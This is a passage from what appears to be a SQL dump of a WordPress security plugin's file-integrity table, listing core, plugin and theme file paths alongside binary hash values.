�','wp-content/plugins/unyson/framework/extensions/backups/config.php',0,'ɡ�-2,/�2�\n_s','ɡ�-2,/�2�\n_s','B�Q(�n^cI�����J�~�n@a�5B�^�ˏ�','',0,'?'),('�N: ������@�kς','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(���u��s��51��','�����p�n10e��\\a�)��J��<!��F','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p����R櫷�\'G','����WwYKL\n��	-*���^e\"e�(_,g','',0,'?'),('�]F���}�w���}','wp-content/plugins/contact-form-7/modules/recaptcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/N�fTT̿ftט��-�','�p��U\'[\rХ�?F9���F����!�\"+���_i','',0,'?'),('�^����%�,�C','wp-content/themes/sg-window/img/icons/small/twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z_s�6P�a:|sJ','�0��Mޛ���(Q\\0Һ�s6LV��c��ʫ','',0,'?'),('�_)-�]�ˌkO	��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt���	\'S_��̄E�s��_�)^�','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�w�1{ۿmJ�I��','wp-content/themes/sg-window/publication/sidebar.php',0,'��ѫl��I<�E%ȰX','��ѫl��I<�E%ȰX','5����:8_��&�y^:sDEƈ�K�e�*1w;','',0,'?'),('�{��0|�>h�4KGQ','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/class-fw-shortcode-widget-area.php',0,'�l��^X�A(���\'','�l��^X�A(���\'','a�*Y���\Z|x�:�򞼪��O�!_[�(V','',0,'?'),('�|��f�����,2�T	','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('�~	3;>0��#�n��b','wp-content/themes/point/js/customscripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߦ`�=DH�P٭twS','C�g,��3�7�Fj���y\r�d����Nر���','',0,'?'),('΃�H\Z�Z���压','wp-content/themes/wen-business/sidebar-contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AUn�y�p��t�fĖ','G��)^e7>�(���d�$+�W�N�)��-O�U','',0,'?'),('Ά�h���^���R�J!','wp-content/themes/fluida/resources/fonts/blocks.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�θ����W���r�>','�\r��B�Ȱ����ޏ������$�A��`�','',0,'?'),('Αs�Ȩ��V��e/X','wp-content/themes/fabulous-fluid/js/jcf.number.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��V�D�NW��p��','�o����Phu�d�M�>e\r%�<m�5���w(','',0,'?'),('Β�߉�^�<&T6�','wp-content/plugins/unyson/framework/includes/option-types/addable-option/class-fw-option-type-addable-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`7�P�h��I\"i��','��\0�x�隔��Ż�����T�����','',0,'?'),('ΔY&,��{�}�I�','wp-content/themes/fluida/includes/landing-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�a��]���','�\\�!�=>}͋�_�@�<��v�p1�','',0,'?'),('Ζi�fU��n\r=(=}','wp-content/plugins/spam-captcha/core/utils.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B��}2�XyU��','m������91��pJ�0L�1��*���(','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('α�Z	��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f���BA������Y','�~���țMeH_���|8v�h�a������-','',0,'?'),('ο�*���L��+�','wp-content/themes/clean-magazine/inc/clean-magazine-custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�-��/`g(�h�.','�\'Q�¡6$j��a�w/G�PE�AY����N','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('��y(����I�FC�','wp-content/themes/square/inc/js/admin-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ul0aש���M��','�{GӾ��m��聳�w��x����E\r���e�','',0,'?'),('��>ocn\r]�IՅr','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-bg_highlight-soft_75_ffe45c_1x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�T�M��z�7�','�l$`�1Ur�ZEs ���� �_s�@�K��','',0,'?'),('�\0�˚��i�\0e���M','wp-content/themes/sg-window/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C*n{��Y$�D`zҮٍ','9!O|�i���(��8s6�\nV\"�\nE�7��#m�','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('���SQ�w#F���','wp-content/themes/supernews/acmethemes/customizer/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�Ԧ�7޴@u���','�S��Yx&�V(�&?}]�?�j#�pj�','',0,'?'),('��$e�&�gq�i�m�','wp-content/themes/twentytwenty/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���L�*��H��u���','~��д\"�\'6���xg�k�?$��u�J{R^','',0,'?'),('��u��c�}�fř�','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/history.js',0,'A����<el��	�Q�c','A����<el��	�Q�c','\\��@n������N\r�񟘧�U��d�pS','',0,'?'),('�dum�㙰���r�','wp-content/themes/nirvana/images/socials/AboutMe.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�a����.=^Qh','�A��i�\n�[i�>�1�`��zm\n��/�a*�s','',0,'?'),('�\n(y9\ZX0����R','wp-content/themes/square/js/jquery.bxslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W���ՃkT_��','�L>}^��{�8j���C<츌������nm]','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?W�\Z�$�T�;�^%x','~)�,/�q�5�}\'�`��>��}��.Z�c5�','',0,'?'),('�=�~P6����IT=�','wp-content/plugins/unyson/framework/helpers/class-fw-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q)�&i�Sod�_Wr�','���R�îd���/j�6�k��wW�@F�@�^','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�XC�b�;�f\0;<�','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���S�H1@�kQұ','��^H2m<��LA��m	N��G�)Iw��:�D','',0,'?'),('�[����0|�2Ŷ�','wp-content/themes/twentyseventeen/assets/css/ie9.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ց�����[Y\0���','�\Z.�| �ؤ(�=�16�ƚ�Mϸ�-\n��Gk','',0,'?'),('�]���#��c\\�-��u','wp-content/themes/precious-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؍���K��lR�.�1��','|�B�u�����@r7��k�p�h�.]g^','',0,'?'),('�_q ^��<�8��:�	','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�\0%aő�N7��','�l��YP����՝��Q{$�dY6���Md�','',0,'?'),('�cG����^��A:t��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/views/view.php',0,'U�Pz�v�Or�D����','U�Pz�v�Or�D����','QCS)W�l�H�ͷ�҇-jEb(��N;��p','',0,'?'),('�f��%� �tlu�}','wp-content/themes/clean-magazine/images/gallery/featured3-480x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Yt�ߦEw��r��','hs�5��]�Mۻ�k��L3�V��Q��/g���','',0,'?'),('�o�m3]��2g�U��J','wp-content/themes/aqueduct/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pdP׻�7L�/�g�f��','�m �W�פD�!r�<����y�v�=I�3v^��','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ωv��v|A���o;�','wp-content/themes/sg-window/img/icons/ask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�X�q�J','2�xQ���^17h,e�+�+���Bwh�RT�q','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('ϘL�\'���Ն����','wp-content/themes/illdy/README.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>0),\'��9ذ�!','�@��)?֌n��#?O\\>Os����]��','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,X�d��)����ß','ݏ<C\\�/�b�k��Jly��=����[��R�k�','',0,'?'),('Ϥ��*A\0�؎�\'�iB^','wp-content/themes/morfeu/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����7{��\"|4�BY�','�|�]g�ʂ���m��#Ju,=kL�/�?�','',0,'?'),('ϯ�	��?\r#Ǥ]�t','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/backups.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&���7a�\"','�����6FWr0\r����f2��IMM<\n�','',0,'?'),('ϺLC������4S�N','wp-content/themes/hueman/assets/front/js/ie/selectivizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4;�6IO��7E��3','0~3F��SQ�K���};20Z�K)\r���x\'','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('���SZ�j�4�6��','wp-content/themes/hueman/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IG\n\r��y�ߑ�S�e','�C��������>W57�Ş�O`��f�\'+�','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('��(��>����6��','wp-content/themes/precious-lite/images/bq_bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\밿V�S�\n�����5','�	?h�a� ���׸��^ъ!��.RT(;','',0,'?'),('����ƨl�3�f���J','wp-content/themes/panoramic/customizer/customizer-library/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kC�K��r����4','����.�o!��v�,�4�)�C�ǍǧE','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('�ݚ�y.\0�؜�i�','wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php',0,'[\\�7x���#���\\|(','[\\�7x���#���\\|(','QE\Z=S�D�ϲ����MK��(����V�|T�','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�󗬏','',0,'?'),('���}�>�%?�]�','wp-content/themes/vega/sample/images/full-5.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y���o�,v��j �','�5\\�Z��X�\'}�qR9UlM���\0��l�\"','',0,'?'),('��G�(>�y��j�F','wp-content/plugins/unyson/framework/languages/fw-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vvC�� ^<]�e�6T','����o&�5��p�+y�gş�q̻gӀ\0<','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;���JV���8��+ ','�����sp*���ʂ��.j\Z��b�m£�+K[','',0,'?'),('�@��AO=	�yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ�	▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩	��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('�!�Z��}�r��+NJ�','wp-content/themes/vega/customize/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�KS�5��Ǎ�K��','3ǯ�>u�N���l ��*{&<��v�U�r�','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�4��A�#��og�61�','wp-content/plugins/spam-captcha/lang/spam_captcha-lt_LT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j���>�Cd?̵��:','\\�5E���Vn\\��G 7@�(��r��:tx��','',0,'?'),('�:m��N�H���Qp','wp-content/themes/nirvana/languages/pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W[�����đ?���','��\'R�r��q�fk%U���a[�kmo�D','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:�	','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}������w��F��','��z�H�Օ�t�<vd���>4Lx����L��n','',0,'?'),('�JXy�u$��V|S\n�','wp-content/themes/nirvana/fonts/opensans-regular-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�93J��(�\\���','���) �x��Q4*��,�6��\"ż�E�-','',0,'?'),('�Rc�G\' =\0���ލ','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/archiver/class-ai1wm-extractor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n*�B�B���r�3�S','<�=>������Y�i�C�!����%:\\','',0,'?'),('�ac��I}�f�Ȅ�;','wp-content/plugins/wordpress-seo/admin/views/tool-bulk-editor.php',0,'�a.p\Z�@\0�P���$�','�a.p\Z�@\0�P���$�','n,ImCC3�IWe=��BJ�l����=o\"\'�}~','',0,'?'),('�f-��Q߾}�\\�u�\"','wp-content/themes/hueman/assets/front/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����6��{��9AH','�\r�8��γe���y���̿ǹ��H����-�_','',0,'?'),('ОF�̧��!$ѥ�%\Z','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/service/Google_BatchRequest.php',0,'��B\n�Msng�$�\Z','��B\n�Msng�$�\Z','8�aW�k$� GMqrw�6?���!����/ſrt','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('е7���	�� w','wp-content/plugins/wordpress-seo/admin/pages/xml-sitemaps.php',0,'`��C���WN�L���','`��C���WN�L���','� Ra��Z/��Zi�����4|*Q8%2�','',0,'?'),('����/�EmS��~�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php',0,'�UJ���O!�k\"d','�UJ���O!�k\"d','�i:��Y*�A0B��H��t\r?s\0QO���ҧ','',0,'?'),('�͘=x���ӟ\0�(	�','wp-content/plugins/unyson/framework/includes/option-types/multi-picker/static/css/multi-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Йg7�C�M3�c{F)','<�%K��>�����}t��kI���Q����f�Cu','',0,'?'),('����\'��B�[&','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Tx[6X<��\0','3oA�W(��G\\��}]�P�2���h뤱��1\0t','',0,'?'),('����R�X��췶��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.idna.php',0,'��6�k�wɿ*�h�','��6�k�wɿ*�h�','����!� :<�Z�+��z����H�V�׷\0��m','',0,'?'),('��v����S9�ojEe�','wp-content/themes/mh-magazine-lite/js/modernizr.custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�\\�\\#��w3ـ�8','�6[�l�3�޳Ҭn��~o\Z}gf;��YҦ�','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�\0{��ys�t���ς','}~G7��}�N�K\r���Z�܍m��*FFI�','',0,'?'),('��/<v`6��Y]��\r','wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���������{ƸM�','�\r���E=���K��I�y!Y��v*�\\��_�>','',0,'?'),('��K�M	��¹�$�s@','wp-content/themes/panoramic/library/template-parts/social-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��]K.LDO�zPн[','�A�e�B�J��sHxZ�>�������\r*��)','',0,'?'),('��w̘.�0�(!��','wp-content/themes/relia/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5R��M[�$�7F','�2��wP��ZVA	U*pC�S9%R/\"gN�r�X','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('�\0g0�R\ZLv��2HO','wp-content/themes/verbosa/admin/images/image-style-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�~���߱h��G�E','�\0�K��5���8O��~�O�oqIk2��Q','',0,'?'),('�\0p��WG�\r}^\r�̈́L','wp-content/plugins/contact-form-7/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wSS���%�4I��','������������?�vW!�S;Y��:','',0,'?'),('�\"�H2B�;��n4=�O','wp-content/plugins/spam-captcha/core/templates/css/css_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�&Zs\"�i�r�\r�g�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/zh-CN.js',0,'�Z-!�t�\"���<)\0','�Z-!�t�\"���<)\0','�Cs�x׷��\0��~��*��Z\\S0�gBFϨ','',0,'?'),('�>�ڙX�BD�~��','wp-content/themes/nirvana/images/socials/IMDb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�?tF��O�\"S;','�-lǠHtq\n��ț�́�]d(�������W','',0,'?'),('�K�?ػ����x��','wp-content/themes/sg-window/js/theme-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�G`�?ɼ���','6Ze���:���e�޶\Z�qG�7M\n��8s','',0,'?'),('�R����a\roZ��ל','wp-content/themes/nirvana/images/nivoslider/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�ï\"I��\n���','�o�\0Cj���\ZM�;2�D���\r�2	����','',0,'?'),('�UW�~/N��	�	�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nԤ���榡..�X	','���`5�ş�wo���(^�5��U_�gJ�','',0,'?'),('�\\��o}���~G�K-Б','wp-content/themes/square/css/jquery.bxslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I<)HD��`(�6��U','�\'\'A�5��x����\n]r�t5�_�`��o�','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��}�as�	����?�w','��K���yc��TsKfsb{���-	k�X��','',0,'?'),('�kwz���\\�A���I�','wp-content/themes/hueman/assets/admin/img/col-2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�_��p��Ͽz�E�f','G뱇:-Y�h쳲U�J�Ǭ-��k�M�f�','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��G��N��8�	��6','�Y���V)�ceW/�Z��mҳn\'n�\0�MK~','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('х�.�)���E��aD','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.en-GB.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�\Z\'��z��+	(AZ�','�eK���u Uhm��]N��W�s&ä��v��','',0,'?'),('і��\"��s�k���83','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Ә������)��n','�(%�L{�0�d� &��X�2I���\Z�ʜgq��','',0,'?'),('ћ�	x�0\nk�Ǣ�9','wp-content/themes/alpha-store/lib/welcome/sections/actions-required.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ף ľE����k��','*����\\A%����Bx\Z,�?s�d6n','',0,'?'),('ѡ&�M]CF�����','wp-content/themes/hueman/assets/front/img/demo/7-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�!�T��l�T�','��otc�{�B,m�t�?u�+AF���af��\n','',0,'?'),('Ѭ�(��ܵyM�����','wp-content/themes/nirvana/fonts/Oswald-Regular-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	���%@�O)%�l','o��9�ج�E�{�M��g3o&z�\\��M�y','',0,'?'),('ѯ*�(����؄�e','wp-content/themes/verbosa/resources/fonts/icomoon.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xRn�;�.�~[�6',';\n����n�a֛���1bs��Ok��ޱ�.4��','',0,'?'),('���r�!��f�PE�','wp-content/themes/vega/color-schemes/orange.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��	=\"��s+\Z%`','�1��ގ�A��Y�T�D�`�\nIR|Hޏ��e�','',0,'?'),('�ӼZ���,H�>�*6','wp-content/themes/relia/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�d�_5�k�	��','�1쌍��{�\Z�.���f[��\r�!\'P���J��','',0,'?'),('��BEA[��\r]�̄��','wp-content/plugins/spam-captcha/core/img/tab_list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k0%�H�Ι�h�c��','�^j�X��~�r̋������&psw�x�ԣ~���','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'�j��D�J�W#<d��','�j��D�J�W#<d��','z��x�y\ZDžE��|�hQO��\r%7','',0,'?'),('�?����82��.1','wp-content/plugins/wordpress-seo/admin/class-help-center.php',0,'���\\�҈yF�b���+','���\\�҈yF�b���+','W���?r�V�2�{�����ئ�@�����ՙ�<','',0,'?'),('�D��w�An��V�|�/','wp-content/themes/alpha-store/lib/cmb_extension/css/select2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�b7��ۻ.%:S,!�','�g.[_��P`��q1)r\'�S{��T�k�7�6','',0,'?'),('��e�5�}�~��','wp-content/themes/fabulous-fluid/images/featured-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'��u\r.�^\"','C\"+{6�fȄ��<R?L�OfPO��Mǽ~','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�?��9�ūh��p','*h�j��9k@wu\"F����\Z���H��}/�_','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ah`L����w9C','�RK��͕JoFAH����8�Zf���k,','',0,'?'),('�8k����˯�L$s>','wp-content/themes/square/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iĐ�/��GjE.u��*','ݗt�7@�\nC(^!a��\n°I)','',0,'?'),('�>�_��Z��B','wp-content/themes/vega/sample/images/full-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�l1|d-���$�dj','H�8��Q=���%��T�[�,cЁ~���\n��/','',0,'?'),('�E^���B��s��~','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryextLinks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mWI|����,]\\؃j�','�t|8wo����ۨ��xF�X�\Z�^p�\"$:�','',0,'?'),('�NqJ�y&�s9U�K�;F','wp-content/themes/aqueduct/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�{Y�\'eF\n�\r��I','01��Ed;�lz�x�t����>��J��e','',0,'?'),('�d�Ů���z�v�{','wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e\n�so��As��','4�.�}�q�dLp�Դ\\���E���{p�v0','',0,'?'),('�r�\"��\n�O�����v>','wp-content/themes/mh-magazine-lite/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W ����C�~O�E�s','/ن}���W��^�z��&�;tةIY-�y-�.','',0,'?'),('�w��\"�����','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_background-variant.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���JxĨm���T�ő','�t�fs�vƳ��d������KW�\rm','',0,'?'),('�x\nA[�*ZxS��9�NY','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','